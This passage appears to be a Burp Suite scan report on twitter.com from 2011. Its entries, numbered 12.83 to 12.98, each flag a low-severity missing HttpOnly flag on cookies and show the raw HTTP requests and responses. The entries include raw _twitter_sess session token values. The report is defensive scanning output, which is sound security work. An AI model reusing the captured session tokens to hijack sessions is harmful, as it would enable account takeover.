_twitter_sess=BAh7CDoHaWQiJTMwNTIyZTg1YmY2Njc3ZmZiYjAyZmEyMGViOWMyOTAwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIneGj4S0B--2358db729323d545c46cdb0ecb8b26170a259191; domain=.twitter.com; path=/
k=173.193.214.243.1296570766765958; path=/; expires=Tue, 08-Feb-11 14:32:46 GMT; domain=.twitter.com
guest_id=12965707698208199; path=/; expires=Thu, 03 Mar 2011 14:32:49 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cloudscan HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.83. http://twitter.com/coolmompicks previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/coolmompicks

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coolmompicks HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.84. http://twitter.com/davidgregory previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/davidgregory

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /davidgregory HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.85. http://twitter.com/designmilk previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/designmilk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /designmilk HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.86. http://twitter.com/donlomb previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/donlomb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJWIwYjRkNGZkZWJkMjQyMWVkNmJkZTgzMzI3MzdlNjhjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIzPaj4S0B--030bb95a52ee53c76439bbd70cb14ed1d739a3fd; domain=.twitter.com; path=/
k=173.193.214.243.1296570772308394; path=/; expires=Tue, 08-Feb-11 14:32:52 GMT; domain=.twitter.com
guest_id=12965707752439485; path=/; expires=Thu, 03 Mar 2011 14:32:55 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /donlomb HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.87. http://twitter.com/favorites/toptweets.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/favorites/toptweets.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCPJPud4tAToVaW5fbmV3X3VzZXJfZmxvdzA6%250AB2lkIiUwZWU5YmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2Y2E4OSIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--0a212e703bac9709a6ddd2f1c5c5ab3b89a5d893; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favorites/toptweets.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1296663640463=cachebust HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; k=173.193.214.243.1296227675375304; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCPJPud4tAToVaW5fbmV3X3VzZXJfZmxvdzAi%250ACmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7%250AAAY6CkB1c2VkewA6B2lkIiUwZWU5YmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2%250AY2E4OQ%253D%253D--ef6ced9d16358caf25f8d9b08a62f50e6303ddca; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; __utmc=43838368; __utmv=43838368.lang%3A%20en; __utmb=43838368.3.10.1296663641

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:19:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663587-30796-35299
X-RateLimit-Limit: 150
ETag: "1e70462644a7d8ec14b1b5205ff1f5f5"-gzip
Last-Modified: Wed, 02 Feb 2011 16:19:47 GMT
X-RateLimit-Remaining: 150
X-Runtime: 0.10378
X-Transaction-Mask: 0b5b266a28469a7b52ded76c9a66f018
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1296667187
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCPJPud4tAToVaW5fbmV3X3VzZXJfZmxvdzA6%250AB2lkIiUwZWU5YmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2Y2E4OSIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--0a212e703bac9709a6ddd2f1c5c5ab3b89a5d893; domain=.twitter.com; path=/
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 34225

TWTR.Widget.receiveCallback_1([{"text":"Joseph Gordon-Levitt is joining Christopher Nolan's The Dark Knight rises; rumor has it he may be The Riddler. http:\/\/imdb.to\/gNaSRG","coordinates":null,"in_
...[SNIP]...

12.88. http://twitter.com/gamespot previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/gamespot

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gamespot HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.89. http://twitter.com/home previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CToOcmV0dXJuX3RvIhxodHRwOi8vdHdpdHRlci5jb20vaG9tZToHaWQi%250AJTc1MWVkZGFkY2U0ZTA5ZWEzMjY1NDE4ZGY4ZDkwN2Y3IgpmbGFzaElDOidB%250AY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA%250AOg9jcmVhdGVkX2F0bCsIpNij4S0B--dcc4849ac34a78440fd009f0b72ed339fdb9dec1; domain=.twitter.com; path=/
k=173.193.214.243.1296570765300464; path=/; expires=Tue, 08-Feb-11 14:32:45 GMT; domain=.twitter.com
guest_id=129657076752217773; path=/; expires=Thu, 03 Mar 2011 14:32:47 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Found
Date: Tue, 01 Feb 2011 14:32:47 GMT
Server: hi
Status: 302 Found
Location: http://twitter.com/login?redirect_after_login=%2Fhome
X-Runtime: 0.00315
Content-Type: text/html; charset=utf-8
Content-Length: 119
Cache-Control: no-cache, max-age=300
Set-Cookie: k=173.193.214.243.1296570765300464; path=/; expires=Tue, 08-Feb-11 14:32:45 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657076752217773; path=/; expires=Thu, 03 Mar 2011 14:32:47 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIhxodHRwOi8vdHdpdHRlci5jb20vaG9tZToHaWQi%250AJTc1MWVkZGFkY2U0ZTA5ZWEzMjY1NDE4ZGY4ZDkwN2Y3IgpmbGFzaElDOidB%250AY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA%250AOg9jcmVhdGVkX2F0bCsIpNij4S0B--dcc4849ac34a78440fd009f0b72ed339fdb9dec1; domain=.twitter.com; path=/
Expires: Tue, 01 Feb 2011 14:37:45 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fhome">redirected</a>.</body></html>

12.90. http://twitter.com/jasmith579 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/jasmith579

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTk3N2U3YTMxNDg1NWUwNjcwZTdlOTdmNDJhZjZjM2UyIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIIVCk4S0B--796785cfb0d38949a5ae8675f3a91166e867ce5c; domain=.twitter.com; path=/
k=173.193.214.243.1296570798090853; path=/; expires=Tue, 08-Feb-11 14:33:18 GMT; domain=.twitter.com
guest_id=129657079811198493; path=/; expires=Thu, 03 Mar 2011 14:33:18 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jasmith579 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.91. http://twitter.com/jobs4writers previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/jobs4writers

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTcyMDA4MmFhOWEwMTE0OWMzZjkwOWM2MTQwZmU4Yjc1Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIneWj4S0B--f76cb5e0d79a1f81cfaea789953eb10c055b5927; domain=.twitter.com; path=/
k=173.193.214.243.1296570768635237; path=/; expires=Tue, 08-Feb-11 14:32:48 GMT; domain=.twitter.com
guest_id=129657077084360183; path=/; expires=Thu, 03 Mar 2011 14:32:50 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobs4writers HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.92. http://twitter.com/ligatt previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/ligatt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCEUbCuctAToHaWQiJWE2OWEyMWIxMTc5YTYw%250ANmZhN2Q3OTIyYzc5ZDYwNWQ4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a4e58d6dbb8d0ce1ed03c56c36f6c02738fdac86; domain=.twitter.com; path=/
k=173.193.214.243.1296661353295022; path=/; expires=Wed, 09-Feb-11 15:42:33 GMT; domain=.twitter.com
guest_id=129666135533188415; path=/; expires=Fri, 04 Mar 2011 15:42:35 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ligatt HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.93. http://twitter.com/lijobs_sales previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/lijobs_sales

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJWYzYTM1Mjk5ZGJhN2YzYzA1NDYxNzI4M2Q1NDUwYTVjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIdDuk4S0B--20a6c586394dd649985d85da8e4da5d7defdfc8e; domain=.twitter.com; path=/
k=173.193.214.243.1296570792688045; path=/; expires=Tue, 08-Feb-11 14:33:12 GMT; domain=.twitter.com
guest_id=129657079281895011; path=/; expires=Thu, 03 Mar 2011 14:33:12 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lijobs_sales HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.94. http://twitter.com/login previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.95. http://twitter.com/millenniumpr previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/millenniumpr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCHkRCuctAToHaWQiJTI1ZmYyOGJhMWQwMGVm%250AYjE3ZjRhNzAyMGYyYTE0OTIyIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--273bebf8e6a59a26f05b04399dca4ed09cc2b74f; domain=.twitter.com; path=/
k=173.193.214.243.1296661350385545; path=/; expires=Wed, 09-Feb-11 15:42:30 GMT; domain=.twitter.com
guest_id=129666135282188420; path=/; expires=Fri, 04 Mar 2011 15:42:32 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /millenniumpr HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.96. http://twitter.com/newtwitter previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/newtwitter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /newtwitter HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664215-56885-60479
ETag: "dfdf75561334d8648e7ee2273c92fd2f"
Last-Modified: Wed, 02 Feb 2011 16:30:15 GMT
X-Runtime: 0.03935
Content-Type: text/html; charset=utf-8
Content-Length: 6372
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<m
...[SNIP]...

12.97. http://twitter.com/omniture previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/omniture

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /omniture HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.98. http://twitter.com/omniturecare previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/omniturecare

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

